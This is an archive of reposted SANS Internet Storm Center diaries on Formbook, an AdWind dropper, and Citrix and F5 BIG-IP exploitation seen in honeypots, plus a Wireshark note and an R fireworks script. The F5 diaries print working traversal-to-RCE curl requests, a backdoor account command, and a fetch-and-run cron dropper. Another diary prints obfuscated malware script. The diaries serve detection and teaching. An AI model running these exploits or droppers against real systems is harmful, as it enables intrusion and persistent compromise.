Tag Archives: Security

Excel spreasheet macro kicks off Formbook infection, (Fri, Jul 10th)

This post was originally published on this site

Introduction

Formbook has been around for years.  According to FireEye, Formbook has been “..advertised in various hacking forums since early 2016.”  My previous diary about Formbook was back in November 2019, and not much has changed since then.  It still bears documentation, though, if only to show this malware is still active and remains part of our threat landscape.

Today’s diary covers a Formbook infection from Thursday, June 9th 2020.


Shown above:  Flow chart for the Formbook infection covered in today’s diary.

The lure

The lure for this particular infection was a malicious Excel spreadsheet.  Searching through VirusTotal, I found a malware sample that I tested in my lab.  The submission name was /tmp/eml_attach_for_scan/2433e76542036ab53b138a98eeda548a.file, so I don’t know what the original file name was.


Shown above: Malicious Excel spreadsheet I found in VirusTotal.


Shown above: The malicious spreadsheet opened on a vulnerable Windows 10 host, ready for me to enable macros.

Initial infection

The initial infection happened immediately after I enabled macros, when my lab host retireved a Windows executable (EXE) for Formbook from hxxp://sagc[.]be/svc.exe and executed the file.  See the images below for details.


Shown above:  My lab host retrieving the Formbook EXE from sagc[.]be after enabling macros.


Shown above: Initial location where the Formbook EXE was saved to my lab host.


Shown above:  Formbook EXE’s final location on my infected lab host with a Windows registry update to keep it persistent.

Data exfiltration

Post-infection traffic was sent to several different domains using URL patterns shown in the next image.


Shown above: Traffic from an infection filtered in Wireshark.

Data stolen by Formbook included a screenshot of my infected lab host, along with keystroke logs, application passwords, sensitive data from the browser chache, and information contained in the clipboard.  This data is temporarily stored in a randomly-named folder under the infected user’s AppDataRoaming directory.  These artifacts are deleted after the data is exfiltrated through Formbook command and control (C2) traffic.


Shown above: Stolen data from the infected Windows host, waiting for Formbook to exfiltrate it over C2 traffic.

Indicators of Compromise (IoCs)

SHA256 hash: 148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc

  • File size: 94,829 bytes
  • File name: unknown
  • File type: Microsoft Excel 2007+
  • File description: Excel spreadsheet with macro for Formbook malware

SHA256 hash: 9ebc903ca6847352aaac87d7f904fe4009c4b7b7acc9b629e5610c0f04dac4ef

  • File size: 481,792 bytes
  • File location: hxxp://sagc[.]be/svc.exe
  • File location: C:Users[username]AppDataLocalTempputty.exe
  • File location: C:Program Files (x86)Bwlsuserwzqlrdw.exe
  • File description: Windows executable (EXE) file for Formbook malware

Traffic from an infected Windows host:

Excel macro retrieves Formbook EXE:

  • 92.48.206[.]34 port 80 – sagc[.]be – GET /svc.exe

Formbook post-infection traffic:

  • 157.7.107[.]81 port 80 – www.lovelydays[.]info – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – POST /ns424/
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – GET /ns424/?[long string]
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – POST /ns424/
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – GET /ns424/?[long string]
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – POST /ns424/
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – GET /ns424/?[long string]
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – POST /ns424/

Unresolved DNS queries from the infected Windows host caused by Formbook:

  • DNS query for www.bakingandcookingandmore[.]com – response: No such name
  • DNS query for www.systemscan12[.]top – response: No such name
  • DNS query for www.lux-dl[.]com – response: No such name
  • DNS query for www.duongtinhot24h[.]com – response: No such name
  • DNS query for www.kcsmqd[.]com – response: No such name
  • DNS query for www.pksbarandgrill[.]net – response: No such name
  • DNS query for www.lx-w[.]com – response: No such name
  • DNS query for www.costcocanadaliguor[.]com – response: No such name
  • DNS query for www.autohaker[.]com – response: No such name
  • DNS query for www.e-golden-boy[.]com – response: No such name
  • DNS query for www.angelalevelsup[.]com – response: No such name

Final words

Formbook infections work nearly the same as they did when I wrote my first diary about Formbook in October 2017.  I’m surprised that I still occasionally run across a sample during my day-to-day research.  An up-to-date Windows 10 with default security settings should prevent these sorts of infection from happening.  I guess it’s still somehow profitable for criminals behind Formbook to continue developing this malware.  Apparently, there’s no shortage of vulnerable Windows hosts for potential targets.

A pcap of the infection traffic and malware samples for today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Active Exploit Attempts Targeting Recent Citrix ADC Vulnerabilities CTX276688 , (Thu, Jul 9th)

This post was originally published on this site

I just can’t get away from vulnerabilities in perimeter security devices. In the last couple of days, I spent a lot of time with our F5 BigIP honeypot. But looks like I have to revive the Citrix honeypot again. As of today, my F5 honeypot is getting hit by attempts to exploit two of the Citrix vulnerabilities disclosed this week [1]. Details with proof of concept code snippets were released yesterday [2].

It is not clear exactly which CVE was assigned to which vulnerability, but the possible candidates are CVE-2020-8195, CVE-2020-8196, 

The first issue, probably the more severe one, is allowing for arbitrary file downloads. I see this issue currently exploited from just one IP address: 13.232.154.46 (Amazon.. my honeypot must have Amazone Prime to get exploits next day).

POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 

The second vulnerability (which I don’t think has a CVE assigned to it, but I will update this diary if I find one), allows retrieval of a PCI-DSS report without authentication. Actually… you still need to “authenticate” I guess, by adding “sig_name=_default_signature_” to the URL :/. 

The full request I see being used (just the Apache log):

POST /pcidss/report?username=nsroot&set=1&type=allprofiles&sid=loginchallengeresponse1requestbody HTTP/1.1" 404 211 "-" "python-requests/2.19.1"

Interestingly: So far, most of the IPs that are scanning for this vulnerability belong to “hostwindsdns.com”

Current IPs:

23.254.164.181
23.254.164.48
43.245.160.163
104.168.166.234
104.168.194.148
142.11.213.254
142.11.227.204
192.119.73.107
192.119.73.108
192.236.162.232
192.236.163.117
192.236.163.119
192.236.192.119
192.236.192.3
192.236.192.5
192.236.192.6

The vulnerability isn’t all that “bad” (I have to look if the report leaks anything specific). It is not allowing access to anything else. But it could very well be used to identify unpatched devices. Some of the other vulnerabilities patched with this update are “interesting”, but more tricky to exploit.

[1] https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
[2] https://dmaasland.github.io/posts/citrix.html


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

If You Want Something Done Right, You Have To Do It Yourself… Malware Too!, (Wed, Jul 8th)

This post was originally published on this site

I’m teaching FOR610[1] this week and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker’s idea is to use a big array containing the second stage payload and interesting strings:

var Kerosene = [
function(){
var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC ….”;
return [function(){
eval("Odds = Odds.replace(new RegExp("!@@", "g"), "A");");
eval("x4Fx64x64x73x20x3Dx20x4Fx64x64x73x2Ex72x65x70x6Cx61x63x65x28x6Ex65x77x20x52x65x67x45x78x70x28x22x6Dx22x2Cx20x22x67x22x29x2Cx20x22x64x22x29x3B");
eval("x4Fx64x64x73x20x3Dx20x4Fx64x64x73x2Ex72x65x70x6Cx61x63x65x28x6Ex65x77x20x52x65x67x45x78x70x28x22x21x22x2Cx20x22x67x22x29x2Cx20x22x6Dx22x29x3B");
return Odds;
}][0]();
},
Array("CreateObject","ReadText","undefined","x61x64x6Fx64x62x2E","x43x68x61x72x53x65x74","x50x6Fx73x69x74x69x6Fx6E","x54x79x70x65","Open","Write","nodeTypedValue"),null
];

Like JavaScript, Windows Script is a language very permissive regarding data types and you can mix functions and strings in the same array. The first element of the array Kerozene[] is a function that deobfuscates a very long string that is also polluted with character substitutions. Once replaced, these characters with the right one, you can decode the Base64 string and get the second payload. The other elements are in a second array with some hex-encoded elements Then the following code is executed:

Kerosene[3] = Array(WSH[Kerosene[1][0]]("x61x64x6Fx64x62x2Ex73x74x72x65x61x6D"),
                    WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"),
                    {bmx: "x75x73x2Dx61x73x63x69x69"});
Kerosene[4] = function(){return Kerosene[3][0];};
[function(){
  Kerosene[3][1].dataType = "x62x69x6Ex2Ex62x61x73x65x36x34";
  Kerosene[3][1].text = Kerosene[0]();
  [function(){
    eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]]. (Kerosene[3][1][Kerosene[1][9]]);");
    eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;");
    eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;");
    eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];");
  }][0]();
}][0]();

Kerosene[0][0](Kerosene[1][Kerosene[2]]());

How does it work? References to elements of the array are replaced by their value during the execution. Example:

WSH[Kerosene[1][0]]("x61x64x6Fx64x62x2Ex73x74x72x65x61x6D")

becomes:

WSH[CreateOject("adodb.stream")

The second payload implements the same obfuscation technique (a Base64 payload is decoded after replacing some garbage characters). The script applies the principle of “help yourself”. The interesting function is GrabJreFromNet() which tries to download a Java Runtime Environment if not already installed on the victim’s computer. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip

The script performs the following test to detect if Java is available or not:

var text = "";
try {
  text = wshShell.RegRead("HKLMSOFTWAREWow6432NodeJavaSoftJava Runtime EnvironmentCurrentVersion");
  text = wshShell.RegRead("HKLMSOFTWAREWow6432NodeJavaSoftJava Runtime Environment" + text + "JavaHome");
} catch(err) {}
try {
  if (text == "") {
    text = wshShell.RegRead("HKLMSOFTWAREJavaSoftJava Runtime EnvironmentCurrentVersion");
    text = wshShell.RegRead("HKLMSOFTWAREJavaSoftJava Runtime Environment" + text + "JavaHome");
    if (text != "") {
      text = text + "binjavaw.exe";
    }
  }
  else {
    text = text + "binjavaw.exe";
  }
} catch(err) {}
try {
  if (text != "") {
    //wshShell.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionRunntfsmgr", """ + text + "" -jar "" + stubpath + """, "REG_SZ");
    wshShell.run (""" + text + "" -jar "" + stubpath + """);
  } else {
    GrabJreFromNet();
  }
} catch(err) {}

The third payload is a Zip file (a JAR file) that contains a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].

[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

F5 BigIP vulnerability exploitation followed by a backdoor implant attempt, (Tue, Jul 7th)

This post was originally published on this site

While monitoring SANS Storm Center’s honeypots today, I came across the second F5 BIGIP CVE-2020-5902 vulnerability exploitation followed by a backdoor deployment attempt. The first one was seen by Johannes yesterday [1].

Running the backdoor binary (ELF) on a separate system, it was possible to verify that it establishes an SSL connection to the address web[.]vpnkerio.com (52[.]32.180.34:443).

Looking for the web[.]vpnkerio.com at VirusTotal while writing this diary, I could find no AV detecting the network addresses or the binary hash as malicious. 

For persistence, it writes a line on “/etc/init.d/rc.local” file on an attempt to start on system boot.

Examining the binary statically, it is possible to see the string’ python -c ‘import pty;pty.spawn(“/bin/sh”)’. It will require more analysis, but it may be used for the attacker to have an interactive terminal on the target system. A proper terminal is usually required for the attacker to run commands like ‘su’.

IOCs:

Exploitation attempt source
96[.]45.187.52

Backdoor URL:
http://104[.]238.140.239:8080/123
 

C2 communication
web[.]vpnkerio.com
52[.]32.180.34:443

The backdoor binary
90ce1320bd999c17abdf8975c92b08f7 (MD5)
a8acda5ddfc25e09e77bb6da87bfa157f204d38cf403e890d9608535c29870a0  (SHA256)

References

[1] https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits, (Mon, Jul 6th)

This post was originally published on this site

Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks Bit IP vulnerability patched last week. Most of the exploits can be considered recognizance. We only saw one working exploit installing a backdoor. Badpackets reported seeing a DDoS bot being installed. 

The simplest way to achieve limited command execution is the use of BigIP command-line interface commands. But the function is a bit limited. However, to achieve full-featured command execution, it is possible to just create an alias that points to “bash”. 

The result is full code execution in three steps (these requests can us POST or GET. I am using GET here to make them easier to display):

1. Create an “alias” to map the “list” command to “bash”

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'

{"error":"","output":""}

2. Write a file to /tmp with the command to be executed

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'

[several empty lines as output]

3. Use the alias to execute the command.

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'

{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0n"}

4. Optionally: remove the alias.

curl'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

{"error":"","output":""}

If you do not need code execution, you can also use “Step 2” to write files, or you can just read arbitrary files in one step using:

curl -k 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'

{"output":"BIG-IP release 15.1.0.1 (Final)n"}

Instead of defining an alias, the technique in step ‘1’ can also be used to execute BigIP CLI command directly, for example, to retrieve password hashes (note this only work if the alias is not defined):

curl 'https://f5.sans.edu//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

{"error":"","output":"auth user admin {n    description "Admin User"n    encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi/n    partition Commonn    partition-access {n        all-partitions {n            role adminn        }n    }n    shell nonen}n"}

Most of the commands I have seen so far are “id”, “ls” and retrieving files like “/etc/paswd” and the BigIP license file. More interesting commands:

* Adding a backdoor root account:

tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash

* Adding a backdoor cron job:

curl 217.12.199.179/b.sh|sh

which retrieves:

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR=”wget -q -O -“
if [ -s /usr/bin/curl ]; then
  LDR=”curl”
fi
if [ -s /usr/bin/wget ]; then
  LDR=”wget -q -O -“
fi

crontab -l | grep -e “217.12.199.179” | grep -v grep
if [ $? -eq 0 ]; then
  echo “cron good”
else
  (
    crontab -l 2>/dev/null
    echo “* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1”
  ) | crontab –
fi

this will check the URL once a minute for updates via cron. So far, I have not seen any other scripts return. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

CVE-2020-5902: F5 BIG-IP RCE Vulnerability, (Mon, Jul 6th)

This post was originally published on this site

A remote code execution vulnerability %%cve:2020-5902%% in F5’s BIG-IP with CVSS score 10 is actively exploited.

Vulnerable versions are:

  • 11.6.1-11.6.5.1
  • 12.1.0-12.1.5.1
  • 13.1.0-13.1.3.3
  • 14.1.0-14.1.2.5
  • 15.0.0-15.1.0.3

A directory traversal in the Traffic Management User Interface (TMUI) allows upload and execution of scripts (as root) by unauthenticated attackers.

F5 has released patched versions:

  • 11.6.5.2
  • 12.1.5.2
  • 13.1.3.4
  • 14.1.2.6
  • 15.1.0.4

F5’s KB article K52145254: TMUI RCE vulnerability CVE-2020-5902.

We have observed Internet scans for this vulnerability. Remark that an attack over the Internet requires that F5’s BIG-IP control plane is exposed to the Internet (there are 8400+ F5 systems on the Internet according to Shodan).

Several exploits and a Metasploit module for this vulnerability are public.

There is also a sigma rule and an nmap script (remark: not released by nmap).

We recommend to patch this vulnerability immediately if you expose the TMUI to the Internet, and if you can not do that, remove direct access to the TMUI from the Internet if you expose it.

In any case, go over your logs to identify exploitation attempts (F5 published the KB July 1st, and first exploitation attempts on te Internet were observed starting July 3rd): look for “..;” in the URLs. If you use grep (or another tool with regular expressions) to search through your logs, remember that . matches any character: use a fixed string (option -F in grep).

And let me close with Johannes closing remark on today’s StormCast: “… certainly make sure that the management plane is not exposed to the public Internet, who knows when the next vulnerability in this feature will be found!”

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

CVE-2020-5902 F5 BIG-IP Exploitation Attempt, (Sun, Jul 5th)

This post was originally published on this site

A quick heads-up: we are seeing scans for F5 BIG-IP’s vulnerability %%cve:2020-5902%%.

They look like this (Host header redacted):

GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1
Host:x.x.x.x
User-Agent: Nuclei – Open-source project (github.com/projectdiscovery/nuclei)
Accept: */*
Accept-Language: en
Connection: close
Accept-Encoding: gzip

Here is a sigma rule for CVE-2020-5902.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 3.2.5 Released, (Sun, Jul 5th)

This post was originally published on this site

Wireshark version 3.2.5 was released.

It has a vulnerability fix and bug fixes.

A vulnerability in the GVCP dissector (%%cve:2020-15466%%) can be abused to cause an infinite loop.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Happy FouRth of July from the Internet Storm Center, (Sat, Jul 4th)

This post was originally published on this site

For our readers in the United States, the 4th of July is Independence Day. As the 4th, under normal COVID-free circumstances, is typically celebrated with fireworks events, I thought I’d deviate a bit from information security topics and instead share a bit of code to create your own fireworks using R, a language and environment for statistical computing and graphics. My teams and I use R and Python constantly as part of security data analytics, particularly for data science and machine learning to further our detection practices and better identify anomalies of significance. You can follow along at home using RStudio as your IDE, and the latest version of R, 4.0.2 as this is written. All credit is due specifically to Edward Visel of Uptake, this is entirely his code, just modified ever so slightly for our purposes here. Edward was experimenting on his path to the perfect R-generated firework but I like each of them as variants in and of themselves. In the spirit of the old red, white, and blue, I selected three specific patterns, namely his explosion, particles and gnats, and the final firework. This work uses the tidyverse, sf, and gganimate packages, I pulled in magick to manipulate the resulting GIFs a bit. If you just want the TL;DR version, the results of the effort follows immediately, the code is in-line immediately thereafter. Happy 4th of July for those of you who celebrate it, cheers, stay safe and healthy to all!

Russ McRee | @holisticinfosec

Red

library(tidyverse)
library(sf)
library(gganimate)
library(magick)

theme_set(theme_void() + theme(
  panel.background = element_rect(fill = 'black')
))

#Explosion
p1 <- map_dfr(1:10, ~crossing(
  x = runif(30),
  nesting(
    y = seq(1, .x, length.out = 10)^0.5,
    t = 1:10)
)
) %>%
  ggplot(aes(x, y)) +
  geom_point(color = 'red') +
  coord_polar() +
  transition_time(t) +
  shadow_wake(0.5)

p1_gif <- animate(p1, renderer = gifski_renderer(), fps = 50,
                  width = 250, height = 250)

#Particles & Gnats
p2 <- map_dfr(1:10, ~tibble(y = seq(1, .x, length.out = 10), t = 1:10)) %>%
  mutate(x = runif(n())) %>%
  ggplot(aes(x, y)) +
  geom_point(color = 'white') +
  coord_polar() +
  transition_time(t) +
  shadow_wake(0.5)

p2_gif <- animate(p2, renderer = gifski_renderer(), nframes = 70, fps = 50,
                  width = 250, height = 250)

#Firework

p3 <- map_dfr(1:10, ~crossing(
  x = {
    x = seq(30) + 0.6*.x;
    ifelse(x > 30, x - 30, x)
  },
  nesting(
    y = seq(1, .x, length.out = 10)^0.5,
    t = 1:10)
)
) %>%
  ggplot(aes(x, y)) +
  geom_point(color = 'blue') +
  coord_polar() +
  transition_time(t) +
  shadow_wake(0.3)

p3_gif <- animate(p3, renderer = gifski_renderer(), fps = 50,
                  width = 250, height = 250)

p1_mgif <- image_read(p1_gif)
p2_mgif <- image_read(p2_gif)
p3_mgif <- image_read(p3_gif)

image_write(p1_mgif, path = "red.gif", format = "gif", quality = 75)
image_write(p2_mgif, path = "white.gif", format = "gif", quality = 75)
image_write(p3_mgif, path = "blue.gif", format = "gif", quality = 75)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.